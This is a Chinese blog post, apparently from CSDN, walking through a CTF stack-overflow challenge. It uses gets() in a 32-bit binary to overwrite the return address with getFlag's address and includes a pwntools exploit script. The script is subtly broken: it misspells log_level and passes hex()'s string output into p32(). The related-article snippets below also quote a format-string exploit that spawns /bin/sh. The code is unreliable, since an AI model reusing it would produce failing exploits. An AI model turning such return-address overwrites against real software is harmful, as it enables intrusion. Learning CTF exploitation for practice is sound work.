PWN简单堆栈溢出漏洞利用(二)

最新推荐文章于 2024-05-16 21:11:40 发布
最新推荐文章于 2024-05-16 21:11:40 发布
阅读量786 收藏 1
点赞数
分类专栏: PWN 文章标签: pwn 栈溢出 gets 跳转 eip
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43921239/article/details/99315129
版权

PWN简单堆栈溢出漏洞利用(二)

题目来源
下载链接(密码akcz)
题目需要读取flag文件才能正确显示出flag,也就是下文中显示的 This is flag
创建办法:
在/home/pwn/pwn1目录下创建一个名为flag文件,打开并写入This is flag

1. 运行程序、查看文件类型、保护措施

img

程序让我们输入一段字符串,并返回我们所输入的内容。

img

看到是一个 32位 动态链接的ELF文件

img

2.反汇编分析

将程序拉到IDA分析,发现有getFlag()foo()函数;

打开main(),按F5显示对应伪C代码

看见调用了foo(),那也就顺势看看foo()里面有什么;

这里与前一篇文章中不同的是foo()中没有传递参数

函数体中主要操作是:让我们输入一个字符串,打印输入的字符串,然后返回。没有与篇一中一样,用判断语句后调用getflat()函数,但仍然使用的是gets()输入函数,也就是说仍然可以通过gets()输入过长字符串造成栈溢出。

我们知道main()调用foo()函数时,首先将参数变量压栈,然后将返回地址压栈,接着mov ebp,esp将旧栈顶作为栈底。也就是说我们可以通过栈溢出,覆盖返回地址,从而达到跳转调用getflag()的目的

3. 调试分析payload

按照上面分析,需要在输入字符串时准确覆盖变量a1的值,那么问题就转换为:payload长度是多少?payload内容是什么?

  • payload长度是多少?

    首先确定变量s写入地址到栈底距离。IDA中打开foo()查看变量s定义处,IDA分析变量s距离栈底是1c。

    最后确定payload长度为:0x1c+0x4(ebp)=0x20=32

  • payload内容是什么?

    已经确定了payload长度为32,其中前28个为无实际意义填充,最后4个应该为getFlat的起始地址。

    获取getFlat起始地址有两种方法:

    • 将程序丢进ida后,在function window中查看

    • 使用pwntools中的ELF对象的symbols方法

      In [1]: from pwn import *

In [2]: elf = ELF('./pwn1')#加载程序;创建ELF对象
[*] '/home/skye/pwn/pwn1/pwn1'
    Arch:     i386-32-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x8048000)

In [3]: elf.symbols['getFlag']#查询getFlag函数地址
   ...: (十进制)
Out[3]: 134514011

In [4]: hex(134514011)#转换为16机制
Out[4]: '0x804855b'

    最终确定payload内容为:A*28+0x804855b

3. 编写payload利用脚本

from pwn import *

#start debug 可选不影响结果 打开可以看见输入输出多少字节等详细信息
context.log_levle = 'debug'

pwn = process('./pwn1')
elf = ELF('./pwn1')

getFlagAddr = hex(elf.symbols['getFlag'])
print pwn.recvline()

payload = 'A'*28
payload += p32(getFlagAddr)

pwn.sendline(payload)

print pwn.recvline()
print pwn.recvline()

4. 总结

  • 可以溢出修改函数的返回地址,达到跳转任意地址的目的

  • 两种方法获得函数开始地址:ida function window、pwntools-ELF-symbols

SkYe231_
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
[PolarCTF]PWN-8字节能干什么
2301_79932273的博客
10-12 160
泄漏出ebp的值后,还需要计算一下相对的偏移。继续在ida里查看题目,还可以看到shell函数,但只提供了。,这里存在溢出,但是只能溢出8个字节,刚好覆盖。知道了偏移和ebp,就可以算出输入的起始地址。程序为32为elf文件,并开启了NX保护。,我们就可以根据相应的偏移来定位栈的位置。前的4个字节无所谓,可以随便填,此时。是需要根据输入长度进行计算的。的函数,溢出长度只有8字节无法构造。的值也打印出来,这就泄漏了。,计算便宜确定栈的位置;的地址已经无所谓了,所以。通过第一次输入输出泄露。
Pwn学习历程(1)--基本工具、交互、调试
热门推荐
Aka丶的博客
12-02 5万+
1、 从基础开始1.1 简单原理介绍以下内容摘自Wiki:   Pwn是一个骇客语法的俚语词,自”own”这个字引申出来的,这个词的含意在于,玩家在整个游戏对战中处在胜利的优势,或是说明竞争对手处在完全惨败的情形下,这个词习惯上在网络游戏文化主要用于嘲笑竞争对手在整个游戏对战中已经完全被击败(例如:”You just got pwned!”)。   在骇客行话里,尤其在另外一种电脑技术方面,包
Pwnprintf漏洞
weixin_52553215的博客
03-10 1101
参考:https://bbs.pediy.com/thread-250858.htm Format String 介绍 1 printf("Team Name: %s\tPoints: %d\n", "Whitzard", 999); 在上面这行语句中, "Team Name: %s\tPoints: %d\n"为格式化字符串(即printf第一个参数),"Whitzard"、999分别为第个和第三个参数。在格式化字符串解析时,格式化字符串中的 "%s" 对应
pwn入门笔记(4)——如何利用printf漏洞突破canary保护
weixin_45551695的博客
07-29 437
实例分析 编译printf2.c ,要加canary保护 输入 写exp,利用printf漏洞来突破canary 并且覆盖ret #include<stdio.h> void exploit() { system("/bin/sh"); } void func() { char str[0x20]; read(0, str, 0x50); printf(str); read(0, str, 0x50); } int main() { func()
pwn(基础的栈溢出-上)
最新发布
2302_80935968的博客
05-16 787
编译器使用堆栈传递函数参数、保存返回地址、临时保存寄存器原有值(即函数调用的上下文)以备恢复以及存储本地局部变量栈的特点:后进先出的数据结构,栈的结构是从进程高地址向进程低地址生长这里说一下寄存器:寄存器是处理器加工数据或运行程序的重要载体,用于存放程序执行中用到的数据和指令。因此函数调用栈的实现与处理器寄存器组密切相关。最初的8086中寄存器是16位,每个都有特殊用途,寄存器名城反映其不同用途。由于IA32平台采用平面寻址模式,对特殊寄存器的需求大大降低,但由于历史原因,这些寄存器名称被保留下来。
pwn学习资料整理——x64中的printf回显漏洞
recover517的博客
08-04 373
利用printf打印栈中内容 B站上有讲解有关printf回显栈数据的课程,但都是以x86为例,这次做题遇到x64架构下的相关漏洞,故做本次记录。 IDA伪代码 int __cdecl main(int argc, const char **argv, const char **envp) { char v4[32]; // [rsp+0h] [rbp-30h] BYREF char buf[16]; // [rsp+20h] [rbp-10h] BYREF setvbuf(stdin, 0L
linux调用system参数格式化,湖湘杯2017 PWN 200格式化字符串漏洞详细WriteUp
weixin_35948624的博客
05-12 208
*本文中涉及到的相关漏洞已报送厂商并得到修复,本文仅限技术研究与讨论,严禁用于非法用途,否则产生的一切后果自行承担。格式化字符串漏洞原理pwn题中,有形如下述代码的形式就是格式化字符串漏洞charstr[100];scarf("%s",str);printf(str)也许使用者的目的只是直接输出字符串,但是这段字符串来源于可控的输入,就造成了漏洞。示例程序如下编译:gcc -m32 -o str...
basics-of-pwn:我的课程是有关基本的进制漏洞利用的。:diving_mask:
04-12
目录[堆栈溢出] [跳转到任意地址] [Shellcode编写] [NOP链] [使用python pwntools模块轻松利用堆栈溢出] [格式化字符串漏洞] [格式化字符串说明符] [读取任意数据] [开发] [堆溢出] [安全技术] [不可执行的堆栈(NX...
ciscn-2019-pwn
11-29
- **baby_pwn** 文件可能是最简单的,设计用来教授基本的堆栈溢出或格式字符串攻击等基础知识。 总的来说,"ciscn-2019-pwn"挑战涉及了网络安全中的漏洞利用技术,参赛者需要具备逆向工程、内存安全理解、编程和...
信息安全_CTF中PWN题目实例分析.pptx
08-14
在本文中,我们将深入分析 PWN 题目中的常见漏洞,包括堆栈溢出漏洞和格式化字符串漏洞,并对其进行详细的分析和解释。 堆栈溢出漏洞 堆栈溢出漏洞是一种常见的漏洞类型,发生在函数调用时,函数的返回地址被覆盖...
Double ciscn 2019 第十届全国大学生信息安全竞赛
04-22
2. **内存安全**:了解堆栈、堆、全局变量等内存区域的工作方式,以及缓冲区溢出、格式字符串漏洞、Use-After-Free等常见内存安全问题。 3. **操作系统原理**:理解进程、线程、内存管理、权限模型等,这些是构建...
pwn:渗透测试,Metasploit,进制开发,逆向工程,加密和其他与CTF相关的活动的日志
04-28
3. 进制开发:在CTF中,进制开发涉及到编写和分析低级别的机器代码,这可能包括汇编语言编程、堆栈溢出、格式字符串漏洞等技术。了解这些技能可以帮助参赛者理解和创建能够绕过安全防护的代码。 4. 逆向工程:...
CTF PWN之精确覆盖变量数据
m0_59598029的博客
07-30 182
刚开始接触pwn的朋友在做pwn练习时可能会有这样的疑问,怎么做到精确覆盖变量数据呢?我们做pwn练习之前需要先知道:命令行参数C语言的main函数拥有两个参数,为int类型的argc参数,以及char**类型argv参数。其中argc参数的值表示命令行参数的个数,而argv则指向一个字符串数组,该数组存储了具体的命令行参数的内容。这里就用今天的实验,给大家介绍一下!看下面的例子 打印命令行参数信息的示例代码(位于/home/test/2目录下):​注意程序本身的名字为命令行的第一个参数。
ISG pwnme100 poc 学习
Bluish Assassin's Creed
11-21 2115
ISG pwnme100 poc 学习 背景 最近在学习ISG2015比赛的 FlappyPig 的writeup(http://bobao.360.cn/learning/detail/702.html),对其中的pwn比较感兴趣,因此查阅了部分资料后对poc进行了研究。 其中在csdn上海枫的专栏(http://blog.csdn.net/column/details/buffer-ove
[pwn]关于printf输出时机的坑
Breeze的博客
08-26 8313
关于printf输出时机的坑 今天遇到了一个特别有意思的题,本来很简单的利用,但一直没有算出来,最后发现是一个很简单的却很细节的问题。 welpwn详细writeup 题目地址:welpwn 首先查看一下安全策略: 保护很少,然后看一下代码逻辑: read读入了0x400个字节,一般这么长必有溢出,注意echo并不是系统函数,查看echo逻辑: s2只有16个字节,但却复制了一个0x400字...
CCTF-pwn3-printf
leeham的博客
09-08 2229
CCTF-pwn3-printf 开始做“实验吧”里边的溢出题目:printf 文件解压缩之后发现里边的压缩包名为cctf-2016-pwn,于是之后就一直看cctf-2016-pwn这题的思路。 当前的结果是: 可以通过题目压缩包中的pwn-ELF文件拿到本地Shell,但是连接到服务器上就不行了……目前仍在解决当中;而且复制粘贴已有的expoit只能获取到服务器上的shell,无法获取...
漏洞学习笔记——堆溢出原理
谈成(C/C++)
04-14 3641
最近在学习堆的溢出原理,但是查了网上和书上的一些讲解,总是感觉缺少一些关键点。所以理解起来总是有点晕,经过努力的调试分析后,总结了下面的更为详细的堆溢出原理。如果不准确的地方,希望大佬可以提醒一哈~ 1.堆的结构: struct _LIST_ENTRY{ DWORD Flink; DWORD Blink; } //空闲堆头结构 struct _HEAP_FREE_ENTRY{ union{ struct{ union{ struct { WORD Size;
CTF-PWN-printf(实验吧|格式化字符漏洞)
SuperGate的博客
02-01 3249
首先运行文件,发现需要输入name,于是打开ida逆向出正确的name,来到了程序主界面。 首先我们先逐一判断函数的用途。put_file是让我们输入文本名称和内容,get_file是让我们输入文本名称,然后程序输出文本内容。show_dir是按照先来后出输出所有的文本名称,并且无缝衔接。 这个时候我们发现get_file函数中显然有一个格式化字符漏洞。 这种漏洞会导致我们可以控制任意内存的...
堆溢出
weixin_44319142的博客
04-23 3147
原理 堆溢出是指程序向某个堆块中写入的字节数超过了堆块本身可使用的字节数(之所以是可使用而不是用户申请的字节数,是因为堆管理器会对用户所申请的字节数进行调整,这也导致可利用的字节数都不小于用户申请的字节数),因而导致了数据溢出,并覆盖到物理相邻的高地址的下一个堆块。 不难发现,堆溢出漏洞发生的基本前提是 1、程序向堆上写入数据。 2、写入的数据大小没有被良好地控制。 思路主要是 1、覆盖与其物...
NJUPT PWN入门:理解栈溢出原理与利用方法
理解栈溢出原理和如何利用它们是黑客进行漏洞利用Pwn技术的基础。掌握这些技巧对于网络安全研究人员、安全工程师以及漏洞评估者至关重要,因为他们需要识别和修复这类漏洞,以保护系统免受攻击。同时,对于学习Pwn...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值